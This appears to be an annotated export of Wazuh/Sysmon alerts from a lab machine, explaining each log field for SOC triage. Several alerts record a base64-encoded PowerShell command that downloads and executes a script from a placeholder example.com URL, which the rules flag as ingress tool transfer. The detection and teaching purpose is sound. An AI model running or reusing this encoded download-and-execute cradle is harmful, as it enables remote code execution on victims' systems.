data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:28.184+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:28.184+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  112
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534428.2068054
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:25.7046533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285960
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:25.693 ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ProcessId: 4932 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z2gh0htk.wyn.ps1 CreationUtcTime: 2025-04-24 22:40:25.693 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:25.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2gh0htk.wyn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:25.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:30.804+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:30.804+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  109
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534430.2070819
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:28.0845268Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285983
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:26.887 ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ProcessId: 11028 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ParentProcessId: 4932 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:26.887
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:30.992+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:30.992+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  113
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534430.2078886
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:28.7262487Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285988
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:28.699 ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ProcessId: 11028 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1 CreationUtcTime: 2025-04-24 22:40:28.699 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:28.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:28.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:33.850+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:33.850+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  110
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534433.2081655
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:31.1947018Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286008
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:29.920 ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ProcessId: 16696 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ParentProcessId: 11028 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:29.920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

